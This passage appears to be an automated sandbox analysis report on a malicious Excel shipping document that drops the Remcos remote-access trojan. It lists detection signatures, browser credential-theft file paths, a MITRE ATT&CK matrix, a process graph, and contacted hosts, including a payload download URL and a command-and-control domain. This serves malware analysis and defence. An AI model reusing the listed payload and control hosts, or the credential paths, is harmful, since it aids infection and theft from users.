                Source: C:\Users\user\AppData\Local\Temp\sm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sm.exe VolumeInformation
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0041203B GetLocalTime,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Contains functionality to steal Chrome passwords or cookiesShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Contains functionality to steal Firefox passwords or cookiesShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: \key3.db
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \key3.db
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: \key3.db

                Remote Access Functionality:

                barindex
                Detected Remcos RATShow sources
                Source: sm.exeString found in binary or memory: Remcos_Mutex_Inj
                Source: remcos.exeString found in binary or memory: Remcos_Mutex_Inj
                Source: remcos.exeString found in binary or memory: Remcos_Mutex_Inj
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: cmd.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: cmd.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: cmd.exe

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting421Application Shimming1Application Shimming1Disable or Modify Tools11OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsNative API1Windows Service1Access Token Manipulation1Deobfuscate/Decode Files or Information11Input Capture211Account Discovery1Remote Desktop ProtocolInput Capture211Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution13Scheduled Task/Job1Windows Service1Scripting421Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsCommand and Scripting Interpreter113Registry Run Keys / Startup Folder1Process Injection221Obfuscated Files or Information41NTDSFile and Directory Discovery4Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsScheduled Task/Job1Network Logon ScriptScheduled Task/Job1Software Packing12LSA SecretsSystem Information Discovery44SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaService Execution2Rc.commonRegistry Run Keys / Startup Folder1Masquerading11Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesPowerShell3Startup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncSecurity Software Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemVirtualization/Sandbox Evasion2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection221/etc/passwd and /etc/shadowProcess Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 336456 Sample: Shipping Document PLBL003534.xls Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 86 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 Multi AV Scanner detection for dropped file 2->90 92 15 other signatures 2->92 13 EXCEL.EXE 83 29 2->13         started        16 remcos.exe 2->16         started        18 remcos.exe 2->18         started        process3 signatures4 106 Obfuscated command line found 13->106 108 Document exploit detected (process start blacklist hit) 13->108 20 cmd.exe 13->20         started        23 cmd.exe 13->23         started        25 cmd.exe 13->25         started        110 Injects a PE file into a foreign processes 16->110 27 schtasks.exe 16->27         started        29 remcos.exe 16->29         started        31 remcos.exe 16->31         started        33 remcos.exe 16->33         started        process5 signatures6 94 Wscript starts Powershell (via cmd or directly) 20->94 96 Obfuscated command line found 20->96 35 powershell.exe 7 20->35         started        37 powershell.exe 16 9 23->37         started        42 powershell.exe 7 25->42         started        process7 dnsIp8 44 sm.exe 3 35->44         started        82 bighoreca.nl 83.172.144.37, 49169, 80 NEDZONE-ASNL Netherlands 37->82 84 cutt.ly 104.22.1.232, 443, 49167 CLOUDFLARENETUS United States 37->84 74 C:\Users\user\Documents\sm.exe, PE32 37->74 dropped 98 Drops PE files to the document folder of the user 37->98 100 Drops PE files with benign system names 37->100 102 Powershell drops PE file 37->102 file9 signatures10 process11 file12 76 C:\Users\user\AppData\...\kXLgfvFKbJs.exe, PE32 44->76 dropped 78 C:\Users\user\AppData\Local\...\tmpC5CF.tmp, XML 44->78 dropped 112 Contains functionality to steal Chrome passwords or cookies 44->112 114 Contains functionality to capture and log keystrokes 44->114 116 Contains functionality to inject code into remote processes 44->116 118 3 other signatures 44->118 48 sm.exe 1 4 44->48         started        51 schtasks.exe 44->51         started        53 sm.exe 44->53         started        55 2 other processes 44->55 signatures13 process14 file15 72 C:\Users\user\AppData\Roaming\...\remcos.exe, PE32 48->72 dropped 57 wscript.exe 1 48->57         started        process16 signatures17 104 Wscript starts Powershell (via cmd or directly) 57->104 60 cmd.exe 57->60         started        process18 process19 62 remcos.exe 2 60->62         started        signatures20 120 Multi AV Scanner detection for dropped file 62->120 122 Contains functionality to steal Chrome passwords or cookies 62->122 124 Contains functionality to capture and log keystrokes 62->124 126 2 other signatures 62->126 65 remcos.exe 62->65         started        68 schtasks.exe 62->68         started        70 remcos.exe 62->70         started        process21 dnsIp22 80 blessings2021.ddns.net 185.244.30.19, 2021, 49170, 49171 DAVID_CRAIGGG Netherlands 65->80

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Remcos\remcos.exe13%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe13%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\Documents\sm.exe13%ReversingLabsWin32.Trojan.Generic

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                18.2.sm.exe.400000.1.unpack100%AviraBDS/Backdoor.GenDownload File
                34.2.remcos.exe.400000.1.unpack100%AviraBDS/Backdoor.GenDownload File
                27.2.remcos.exe.400000.1.unpack100%AviraBDS/Backdoor.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                cutt.ly0%VirustotalBrowse
                blessings2021.ddns.net0%VirustotalBrowse
                bighoreca.nl2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://www.acabogacia.org/doc00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                https://cutt.ly/mjfU5y0PE0%Avira URL Cloudsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.certicamara.com00%Avira URL Cloudsafe
                http://www.globaltrust.info0=0%Avira URL Cloudsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cutt.ly
                		104.22.1.232
                		truetrueunknown
                blessings2021.ddns.net
                		185.244.30.19
                		truetrueunknown
                bighoreca.nl
                		83.172.144.37
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://bighoreca.nl/wp-content/themes/index/Shipppy.exetrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.a-cert.at0Epowershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.e-me.lv/repository0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.acabogacia.org/doc0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpfalse
                  		high
                  http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.certifikat.dk/repository0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.chambersign.org1powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://repository.swisssign.com/0powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                    		high
                    http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://cutt.ly/mjfU5y0PEpowershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000007.00000002.2128354221.000000001D0C7000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.sk.ee/cps/0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.certicamara.com0powershell.exe, 00000007.00000003.2116814482.000000001D020000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.globaltrust.info0=powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
